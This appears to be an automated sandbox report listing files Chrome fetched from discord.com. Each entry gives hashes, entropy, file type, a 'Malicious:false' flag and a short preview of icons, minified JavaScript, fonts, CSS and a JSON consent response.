                                                                                                                                                                                                                                                                                    SSDEEP:6:tnrVzUOtumc4slvIl4slvUldboLYPsd9IZI0OuFxMdIr0a/NdpVo4a38n:trVzNtuCHvOdELYPsuI09z9LdYr38n
                                                                                                                                                                                                                                                                                    MD5:E843C51C0EEC3801B70CAE5C45AD343F
                                                                                                                                                                                                                                                                                    SHA1:AD735360ECFA829DB9D6C48F1A671A99BFCE1D2A
                                                                                                                                                                                                                                                                                    SHA-256:F860149A77A53D43396F3AEC9377B9A0DD6C5D84459079C5D393F6343EC253FB
                                                                                                                                                                                                                                                                                    SHA-512:2AF4816580FD02A2AE107914D967AF966CA97E137434E2668C7A430D34168E150F668AE3A3B005BFF7070D50A0FD89BD0B5A351F5E3DB6F6B167998378308F71
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M2.9932 7.49727C5.48073 7.49727 7.49727 5.48073 7.49727 2.9932C7.49727 1.84421 7.06704 0.795708 6.35889 0C9.50595 0.188323 12 2.80018 12 5.99456C12 9.31127 9.31127 12 5.99456 12C2.80018 12 0.188323 9.50595 0 6.35889C0.795708 7.06704 1.84421 7.49727 2.9932 7.49727Z" fill="#FFFFFF"/>.</svg>.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8522)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):8571
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.511405916704806
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:3RoCBoVnemKEVZxodmEPwwPoclkXrG8FiU:3bqYsZxomwPNlSq8oU
                                                                                                                                                                                                                                                                                    MD5:6340DBB0189AB130A0A6AE039C03F351
                                                                                                                                                                                                                                                                                    SHA1:E8F1AB7241B7341A4309E8959F95FFC04FDB212E
                                                                                                                                                                                                                                                                                    SHA-256:71E1BE4A03EC3BE786431A11B3E80C5F5D5DD2873ADA235C5154EE9DA0304088
                                                                                                                                                                                                                                                                                    SHA-512:3C7F47477D603AACD173B54F69EA908930049BB3D56DE70089B02085FE6C6F51CB84751750D48E1C3CB1A0D7DDED48C98DC2715B1C9F64FCE33FD57C6131E698
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["18543"],{725436:function(t,e,n){n.d(e,{m:function(){return u}});var l=n(454585),r=n(551452),i=n(532901);let a={...l.Z.guildEventRules.link,react:(0,i.Z)({enableBuildOverrides:!1,mustConfirmExternalLink:!0}).react},s={...l.Z.guildEventRules.channelMention,react:(0,r.Z)({enableBuildOverrides:!1,shouldCloseDefaultModals:!0,shouldStopPropagation:!0}).react},u=l.Z.reactParserFor({...l.Z.guildEventRules,link:a,channelMention:s})},315416:function(t,e,n){n.d(e,{Z:function(){return s}});var l=n(192379),r=n(442837),i=n(897285),a=n(924301);function s(t,e,n){let s=(0,r.e7)([a.ZP],()=>a.ZP.getUserCount(e,n));return(0,l.useEffect)(()=>{null!=t&&null!=e&&i.Z.getGuildEventUserCounts(t,e,null!=n?[n]:[])},[e,t,n]),s}},405613:function(t,e,n){n.d(e,{Z:function(){return i}});var l=n(134432),r=n(981631);function i(t,e){let n;if(null==t.image)return null;null==e&&(e=window.screen.width*(0,l.x_)()),e=(0,l.oO)(e);let i=window.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (13325)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):13374
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.33229367944175
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:c9jPMDYeG0dPbPDjzw4WDhiElYrskCLdHWQBC7dr1m+8LBpDtOnyUotvLfQE2u:c9jPMRLjZ0usbxwdr1QBpDtOy3JT
                                                                                                                                                                                                                                                                                    MD5:D0C788B157FF96A2DD902C97BFC889F6
                                                                                                                                                                                                                                                                                    SHA1:6CDE0BD611B34B15CA15437CA5AC4F77DE01ADA8
                                                                                                                                                                                                                                                                                    SHA-256:05A00FBAFFC4A7254C9B631FF0E81BE546DC275BE1D6F992C36849222D0B73F7
                                                                                                                                                                                                                                                                                    SHA-512:170615E3DE829D517662BE32C762B76B013163FA040C2EEDF89C865A9CEE1CEEDA7EE305BE27CD3A724832571A94B5A26FB3BB9D9A1D1C5386081F206A1E1436
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/5067a2ec1b24a6de868c.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["78187"],{526988:function(t,n,r){var e=r(354848),o=r(938507),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a function")}},24033:function(t,n,r){var e=r(622281),o=String,i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not an object")}},953326:function(t,n,r){var e=r(299623),o=r(980855),i=r(49693),u=function(t){return function(n,r,u){var c,f=e(n),a=i(f),s=o(u,a);if(t&&r!=r){for(;a>s;)if((c=f[s++])!=c)return!0}else for(;a>s;s++)if((t||s in f)&&f[s]===r)return t||s||0;return!t&&-1}};t.exports={includes:u(!0),indexOf:u(!1)}},332916:function(t,n,r){var e=r(581031),o=e({}.toString),i=e("".slice);t.exports=function(t){return i(o(t),8,-1)}},381740:function(t,n,r){var e=r(740362),o=r(666061),i=r(347722),u=r(97131);t.exports=function(t,n,r){for(var c=o(n),f=u.f,a=i.f,s=0;s<c.length;s++){var p=c[s];!e(t,p)&&!(r&&e(r,p))&&f(t,p,a(n,p))}}},251069:function(t,n,r){var e=r
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):87973
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.125806607183933
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:f0kGwo/3g1MGEN6UCSQyYHhU58xxfrDX/5CF+gD58G3LpV9H5B7va:f0kGDZc
                                                                                                                                                                                                                                                                                    MD5:E05640582E20F17E0F1797160B67DCD4
                                                                                                                                                                                                                                                                                    SHA1:DCB27383F5836437E5433C7CCB5981E94826EE00
                                                                                                                                                                                                                                                                                    SHA-256:E9DEEBCC271633C282AB3FE440CE81A196ECE4F402804FE8940030F98C563475
                                                                                                                                                                                                                                                                                    SHA-512:60CDDA59E85FDED81B351614DAF3D40B30F939F7F8D9B586F516165699822E8F07F344CDD3709DCF6ADA350C725330DF26B6947322F154AB54D02C5AF3AAD71B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<svg width="1440" height="900" viewBox="0 0 1440 900" preserveAspectRatio="xMinYMin slice" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><g clip-path="url(#b)"><path d="M1440 0H0v900h1440V0Z" fill="url(#c)"/><path d="M1440 0H435.551v620.81H1440V0Z" fill="url(#d)"/><path d="M1440 341.601H484.351v558.38H1440v-558.38Z" fill="url(#e)"/><path d="M1440 0H427.5v690.995H1440V0Z" fill="url(#f)"/><path d="M787.663 810.02c330.987-141.179 530.547-416.834 445.727-615.692C1148.57-4.53 811.492-51.288 480.502 89.891 149.512 231.07-50.048 506.725 34.772 705.583c84.821 198.858 421.901 245.616 752.891 104.437Z" fill="url(#g)"/><path d="M1024.18 825.565c290.6-123.952 456.96-386.723 371.57-586.916-85.39-200.193-390.19-261.999-680.792-138.047-290.602 123.952-456.959 386.724-371.569 586.917 85.389 200.193 390.19 261.998 680.791 138.046Z" fill="url(#h)"/><path d="M673.907 771.815c264.238-112.707 429.363-319.136 368.823-461.073-60.538-141.936-323.823-165.631-588.061-52.924C190.431 370.5
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3146
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.484082045212369
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:C4LO/K7oWBkomgBkRzd0kJBJkI8JkINGD/dYk2kahkzd/FnLgkpmZ5ZOE83VCn:RO/IS53JBJbKbN4WQbMRZmEAI
                                                                                                                                                                                                                                                                                    MD5:81084FF5A27B6E6FF487E479C37D1660
                                                                                                                                                                                                                                                                                    SHA1:81A274F69A1358F85715A0FEA227730D795CB353
                                                                                                                                                                                                                                                                                    SHA-256:075DE1D6EA4FB470197A88BA371F60F70B819B250CB5AF8BD6A4794B1A9CA4A1
                                                                                                                                                                                                                                                                                    SHA-512:CCCD00A5C013B130BE0A8466F903F7EEE9306518DFAA8758849027EBC1829EA2A6B7516E4D2070B110A12EC7EB559E3B75D256AD1B07BE3FD8595C0E430DC0D5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 90 59.19">. <defs>. <style>. .cls-1{fill:#6a94ff}.cls-2{fill:#a9c7ff}.cls-3{fill:#202225}. </style>. </defs>. <g id=".._2" data-name=".. 2">. <g id="Layer_1" data-name="Layer 1">. <path class="cls-1" d="M89.59 19.89 84.93 8.38a5.51 5.51 0 0 0-7.19-3l-5.67 2.25A12.42 12.42 0 0 0 56 .91L45.48 5.16c-1.84 4.11-5.48 9.72-11.59 9.52a8.55 8.55 0 0 1-5.51-2.13c-.12-.11-.24-.22-.34-.33l-12.66 5.13a12.42 12.42 0 0 0-6.9 16l-5 2A5.52 5.52 0 0 0 .4 42.61l4.67 11.51a5.51 5.51 0 0 0 7.18 3l5.64-2.28A12.43 12.43 0 0 0 32 58.28l40.54-16.44a12.43 12.43 0 0 0 7.73-12.22l6.28-2.54a5.52 5.52 0 0 0 3.04-7.19ZM11.65 52.94a2.76 2.76 0 0 1-3.59-1.52l-3.63-9A2.76 2.76 0 0 1 6 38.87l4-1.65 5.69 14.07ZM22.33 39.6a3.72 3.72 0 1 1 2.06-4.85 3.71 3.71 0 0 1-2.06 4.85Zm33.36-1.55-11.77 4.77A10.61 10.61 0 0 1 30.11 37l-3.33-8.23A4 4 0 0 1 29 23.56l23.31-9.44a4 4 0 0 1 5.18 2.19l3.63 9a9.8 9.8 0 0 1-5.43 12.74ZM67.49 21a3.73 3.73 0 1 1
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (21762)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):21811
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.462655463719556
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:f1bjtqrVapZjquHCWnJcJhcby8XziQBy6HUKVMov5hHKs80K:JjtOVaJDnJcPc+EWQ8EM65RR8l
                                                                                                                                                                                                                                                                                    MD5:0FBB77D1B69F18DF0FDCF836DE1C4106
                                                                                                                                                                                                                                                                                    SHA1:E8CE4037B97732809F1E1BF24992959C678F2118
                                                                                                                                                                                                                                                                                    SHA-256:279E49A00A41A18545CF319B5A8B571FD48CFCC4B78A361BBE75A33CE7A4F71A
                                                                                                                                                                                                                                                                                    SHA-512:F73E3B25561D0D3307C7DD9D505F84101897CFA70737D757AED8D95BDC6A2CE116FD114674DD0BBE666AABE2176B0EEF150A5D4EE2C7C3CCE815A5CA73215D03
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/a6f6204cd40c3c5f5c14.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["71984"],{772425:function(t,r,n){var e=n(933676),o=n(938507),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a constructor")}},603528:function(t,r,n){var e=n(838957),o=TypeError;t.exports=function(t,r){if(e(r,t))return t;throw o("Incorrect invocation")}},212036:function(t){t.exports="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof DataView},192291:function(t,r,n){var e,o,i,u=n(212036),f=n(325008),a=n(161581),c=n(354848),s=n(622281),y=n(740362),p=n(974971),h=n(938507),v=n(251069),d=n(859209),g=n(4340),l=n(838957),A=n(144748),w=n(276321),x=n(641236),b=n(457507),T=n(644659),E=T.enforce,I=T.get,R=a.Int8Array,m=R&&R.prototype,O=a.Uint8ClampedArray,M=O&&O.prototype,F=R&&A(R),U=m&&A(m),_=Object.prototype,L=a.TypeError,B=x("toStringTag"),C=b("TYPED_ARRAY_TAG"),S="TypedArrayConstructor",P=u&&!!w&&"Opera"!==p(a.opera),V=!1,N={Int8Array:1,Uint8Array:1,Uint8ClampedArray:1,Int16Array:2,U
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 38156, version 2.66
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):38156
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.992862818603593
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:768:YLYEgWfC/zlP948Q4NxhBiMwYatzdYZyXSihSZ9ia6UBJlly12m9U:YLYEszTFQyxfiMwYmxYZ1p9ia6U7r4U
                                                                                                                                                                                                                                                                                    MD5:3D6549BF2F38372C054EAFB93FA358A9
                                                                                                                                                                                                                                                                                    SHA1:E7A50F91C7EC5D5D896B55FA964F57EE47E11A1B
                                                                                                                                                                                                                                                                                    SHA-256:8E401B056DC1EB48D44A01407CEB54372BBC44797D3259069CE96A96DFD8C104
                                                                                                                                                                                                                                                                                    SHA-512:4BDE638A4111B0D056464CE4FD45861208D1669C117E2632768ACD620FCD924AB6384B3133E4BAF7D537872166EB50CA48899B3909D9DBF2A111A7713322FAD4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/c1b53be672aac192a996.woff2
                                                                                                                                                                                                                                                                                    Preview:wOF2..............|T.......B............................. .`..P..<..W.....8..}.6.$..`..r.. ..n..F..v[.Vq...Q.r......9.../h....r~..y...)Jv.._@....Z...cm.z.(...u..#EMKK..e.mm..2,.FK...Y..mk].{...[.^UR......8p.jD.n.t..k.....b!.C...&8...._.-n69(...N....o..w..1...|.i....!..\...n.^.Kq..../]x.........x..N...=.^".ZF.L.6lD...X..[u.-.............y....\...%.q.....u~.y.K..>.d{...P..BU..2..p.nO.z....y~.....#DT...S.(d-~E.m...][..s...\..+.t..\!H.......'V...@.w..r['bc:V...X.d.86..c.......Xd<..p..N".9...X6..(|.C..t....0x.E.....8_.....Xs..8(...4I.X2J,Y[[....U..^I.y.#...w.R.....).o..i.....a......t+...Pz.%..FB..&.$.dS*.!$...iM;.*...K....;M....z`iw..j;.Su.I...O.Z9.....d....-2.Y2k.5....M.g..1u.$....T../.K.R1... ..?....C.&.wk..N.X....h.B.......};K@S...@'..4.;...|x.I.R....zj..Ph....\7...<.m~U ......Hu.(|SV<...?$.....MO.9.....H..z~R..9rD..y..H........N*..i....}..*"23.+........|i.[..|w..=.a-..E4...f..[....O9..g....x.0.c.f4..p[m.e/...)P......5.M......../..6.&..5.Rw
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):1357376
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.221427814537819
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24576:CAvYPVRJeUzKevkJHflTtZMYuGvyZTQ02JKdmRyCtpgyLYM12Q32yKSxbXATJCtd:CAvkVtzKevkJHflTtZMYuGvyZTQ02JKW
                                                                                                                                                                                                                                                                                    MD5:E081B4EB2A86C860AE7B87266A4995B6
                                                                                                                                                                                                                                                                                    SHA1:D56CD5704E5F75B785F8C416EDACED52071F41EF
                                                                                                                                                                                                                                                                                    SHA-256:AE8B4586EB809160C69491980FBE2456A4F3E5B55195219D59E0A97CD08367D9
                                                                                                                                                                                                                                                                                    SHA-512:4F1E2191205421F4020847FC8849BF606447F2932D799E89EE21CDFA851E9DDCD63F84302D3A69EFE4F490AD60D11344A3EF36880D91FB38DF90CA01E0D32F3B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/69646.32a83a0c7e0a41f066e8.css
                                                                                                                                                                                                                                                                                    Preview:.anchor_af404b{color:var(--text-link);-webkit-text-decoration:var(--link-decoration);text-decoration:var(--link-decoration)}.low-saturation .anchor_af404b{color:var(--text-link-low-saturation)}.anchorUnderlineOnHover_af404b:hover{-webkit-text-decoration:underline;text-decoration:underline}.enable-forced-colors .anchor_af404b,.enable-forced-colors .anchorUnderlineOnHover_af404b{color:LinkText!important;background-color:Canvas;-webkit-text-decoration:underline;text-decoration:underline}.enable-forced-colors .anchor_af404b svg,.enable-forced-colors .anchorUnderlineOnHover_af404b svg{color:currentColor}.enable-forced-colors .anchor_af404b:not([href]),.enable-forced-colors .anchorUnderlineOnHover_af404b:not([href]){color:ButtonText!important}.enable-forced-colors .anchor_af404b:not([href]),.enable-forced-colors .anchorUnderlineOnHover_af404b:not([href]){background-color:ButtonFace}@keyframes spinner-wandering-cubes_b6db20{25%{transform:translatex(22px)rotate(-90deg)scale(.5)}50%{transform:t
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4246
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.103696787604314
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:K9F4GfkbfNyN48/E8jfsrKk1Z/eO4oSgT3I/VcbQokvBD:KnqbfQ48/BfsrKYZ/eOBe9FJD
                                                                                                                                                                                                                                                                                    MD5:DDA77F765068E4450D3545A40B777663
                                                                                                                                                                                                                                                                                    SHA1:63AE45EF489734D09D3AEA98E016C0DD1BC733F9
                                                                                                                                                                                                                                                                                    SHA-256:A644A9364BE96AD0A72F8E24397322B4D0646563A11E8FF76191A9239A561AC9
                                                                                                                                                                                                                                                                                    SHA-512:D88521109D4AC8EA200F644973A7A554C1A6B8E0AE4658C7F0E3FAFBEE40A1CB8A6A75BECB2A49AE3B8D226BEE36CD8CA63B492FABC2BF034D6A295349567946
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<svg width="124" height="24" viewBox="0 0 124 24" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><g clip-path="url(#b)" fill="#fff"><path d="M26.242 2.01A25.218 25.218 0 0 0 19.851 0a18.718 18.718 0 0 0-.819 1.701 23.45 23.45 0 0 0-7.083 0A18.2 18.2 0 0 0 11.121 0a25.13 25.13 0 0 0-6.396 2.015C.68 8.132-.417 14.097.132 19.978c2.682 2.005 5.282 3.223 7.838 4.02A19.514 19.514 0 0 0 9.65 21.23a16.507 16.507 0 0 1-2.644-1.287c.222-.165.439-.337.648-.513 5.098 2.386 10.636 2.386 15.673 0 .211.177.428.348.648.513-.839.505-1.726.939-2.649 1.29A19.432 19.432 0 0 0 23.004 24c2.558-.797 5.16-2.015 7.843-4.022.643-6.817-1.099-12.728-4.605-17.968ZM10.343 16.361c-1.53 0-2.785-1.43-2.785-3.17 0-1.741 1.228-3.174 2.785-3.174 1.557 0 2.812 1.43 2.785 3.174.003 1.74-1.228 3.17-2.785 3.17Zm10.293 0c-1.53 0-2.786-1.43-2.786-3.17 0-1.741 1.228-3.174 2.785-3.174 1.557 0 2.812 1.43 2.785 3.174 0 1.74-1.228 3.17-2.785 3.17ZM41.629 6.122h6.652c1.603 0 2.958.257 4.069.767 1.109.51 1.94 1
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):159629
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.535749167755611
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:kCRnpfBEBt6+wHVGWdJsMnh1fxwsp7SvK:HpfBEBzw1GWdJsmfxwsp7SvK
                                                                                                                                                                                                                                                                                    MD5:45D59B98B784FCC6AC1051E457472A5E
                                                                                                                                                                                                                                                                                    SHA1:A9FCA0345715F53AFB742C9FCC0269C3C05CF5FE
                                                                                                                                                                                                                                                                                    SHA-256:20A0D8DD0B70C73FB0BCC29936E8790C0D6308DDB989C440EE7730F42B8EBE5A
                                                                                                                                                                                                                                                                                    SHA-512:7E6CC181DE5DE01E4B18E8210B77E9E5366F1AB0F3581E8316C6A94F24A7006394CBFBD672E8318B9DCD8DE0964EA0F37061C8C17680E360E1FBFB3B7DE299D1
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["51838"],{863942:function(e,t,n){var i=n(22092);(0,n(192291).exportTypedArrayStaticMethod)("from",n(12367),i)},70519:function(e){e.exports="/assets/76a4af59aa173c519461.svg"},806848:function(e){e.exports="/assets/6183fdc13d8046fd5bda.svg"},231443:function(e){e.exports="/assets/e04bcb7316f7205e85fb.svg"},512266:function(e){e.exports="/assets/a2d51a24d014f52f83a6.png"},105020:function(e){e.exports="/assets/89ea0e62d0f8ffa67a17.svg"},262467:function(e){e.exports="/assets/86755fd1deda5cb45518.svg"},640356:function(e){e.exports="/assets/3880dc73d6be9d91ef36.svg"},515695:function(e){e.exports="/assets/450a761db3bfe89ca9b9.png"},892235:function(e){e.exports="/assets/48f03d965f1e82275006.svg"},375673:function(e){e.exports="/assets/3cf7f333e815240d3294.svg"},73962:function(e){e.exports="/assets/ed7318a94c14ce41d11d.svg"},689411:function(e){e.exports="/assets/831c999494cb5e095eae.svg"},2984:function(e){e.exports=
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (7029)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):7078
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.693672087902241
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:EDHGzBioMyirXyf70li//fZc8Twtv1T5aLdMu951f54aH8L:EDmlioLirXyfYlw/xHWOyuB+acL
                                                                                                                                                                                                                                                                                    MD5:45A3EE5FF96BDB2DD7FBB2846B5EA494
                                                                                                                                                                                                                                                                                    SHA1:795E2BB4E00AB75A91BDBA9A4C7D9E2B2E0CD905
                                                                                                                                                                                                                                                                                    SHA-256:08F280458FAB95C2E5754187C406458A8FE69A1C12329C8EF6CB801067E00BB6
                                                                                                                                                                                                                                                                                    SHA-512:D545E8F9FE857A5A3AC908E1CCDA13ADCD19EFA78AE34143BCB36080C228090B8C5AE446EFE51C4A87A22BD9403B6E851219B331274D8929EB20AF81E9B159F8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/1bab9b095996b8d024ce.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["43222"],{340618:function(r,t,o){var e=o(354848),n=String,c=TypeError;r.exports=function(r){if("object"==typeof r||e(r))return r;throw c("Can't set "+n(r)+" as a prototype")}},442975:function(r,t,o){var e=o(936940);r.exports=!e(function(){function r(){}return r.prototype.constructor=null,Object.getPrototypeOf(new r)!==r.prototype})},33995:function(r){r.exports={IndexSizeError:{s:"INDEX_SIZE_ERR",c:1,m:1},DOMStringSizeError:{s:"DOMSTRING_SIZE_ERR",c:2,m:0},HierarchyRequestError:{s:"HIERARCHY_REQUEST_ERR",c:3,m:1},WrongDocumentError:{s:"WRONG_DOCUMENT_ERR",c:4,m:1},InvalidCharacterError:{s:"INVALID_CHARACTER_ERR",c:5,m:1},NoDataAllowedError:{s:"NO_DATA_ALLOWED_ERR",c:6,m:0},NoModificationAllowedError:{s:"NO_MODIFICATION_ALLOWED_ERR",c:7,m:1},NotFoundError:{s:"NOT_FOUND_ERR",c:8,m:1},NotSupportedError:{s:"NOT_SUPPORTED_ERR",c:9,m:1},InUseAttributeError:{s:"INUSE_ATTRIBUTE_ERR",c:10,m:1},InvalidStateError:{
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 43364, version 3.131
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):43364
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.995499053027601
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:768:fQelRMAMlg6keZjHGyL9BFjYBuukYbpX4Qb0NJ4rLU7KoYVZ:fQeTWlg6kON8cubbpIb+ggf
                                                                                                                                                                                                                                                                                    MD5:281BBA49537CF936D1A0DF10FB719F63
                                                                                                                                                                                                                                                                                    SHA1:4085AD185C5902AFD273E3E92296A4DE3DC19EDD
                                                                                                                                                                                                                                                                                    SHA-256:B78FB569265B01789E7EDD88CFE02ECB2C3FEE5E1999678255F9B78A3B2CC4E8
                                                                                                                                                                                                                                                                                    SHA-512:AF988371DB77831F76EDF95A50B9DDF1E957F0230404C8307914F11211E01CC95C61E0768D55AA4347F24E856D226F7E07AC21C09880E49DBD6346D1760B8BFF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/8234e0a75aa9afb205bd.woff2
                                                                                                                                                                                                                                                                                    Preview:wOF2.......d.......8..............................x...@..\.`..X..>...........".6.$........ .....K...[.q...c...5.nC...U....?...q.zn.<..-...a..C..J;..8.....s......M.@5.u.F....).'.N..9{U.'..u...|.;W....gz;m.o..&A.....o.........Vm/....a.VNF......T/$..iM......".J(...:.F1.x.}.F....%..Xb.3d%....)Yv..'.th..}..&......k.f..%'..i=@..p..wr.<.i.;...c...13..........i....{.F...&{.....A.]....-...?.....<.....J?.9B.&.f.d.).T...S.. n.*..g7N...w.=...|.!......b..s.........qI<F:...p...y...2.h.+1L.,.mG\..4.E%+r...........o#7F..H.-*.h..R..EXdHY.......(....-J....Mg..%m.5I....]rQo.$M..*m..m...dL.m.n.~....clT.m..=.(..3.*...Cz..p........k...dF?......s...rQ.)}....LS....}._.5......z.....P.B$.T.D..OX.r.5..-1.H..pD..L../.........'....&'\.T.N...........-.}J..Z....y.d!t..#....@.].!P5..S.`.A.`....E.y...k..*d.......p..O.H.7...P...q......4.....U.Y2.w4..E. Y]$Y.R...x.=..+...T7.-O..yH.0/.&....E.q1[.uOO[..=\Q"...,..W\q1\a..).......`acasaacc4s...XXX....e..v.-N.oh)...E%..D......#..CL
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):113
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.460750616283363
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YGKjl8jwDEYRrajpHV+wJ6ARORzACDEYkayjY6v:YGKjDRrajpHV9LorMcE
                                                                                                                                                                                                                                                                                    MD5:30B15D37E2F2C6C09F35BCC56B64571A
                                                                                                                                                                                                                                                                                    SHA1:A5566ADA13410C39A4059BEC0FF59D51316D89CD
                                                                                                                                                                                                                                                                                    SHA-256:BE58D93E5BC2C48B3FB9C87BD7140109630195E84CCE67701FCCABCF5256BFE0
                                                                                                                                                                                                                                                                                    SHA-512:EE8E8192B3120D7A2FC9DCE3585D87FAAF689B2E03046C8B7F533FE3CBA408BF0E8614CA2AACD6ED21A206B4B461ECA507D5B38D01839CA9AC5B93971D1F7B10
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"consent_required":false,"country_code":"US","promotional_email_opt_in":{"required":false,"pre_checked":false}}.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
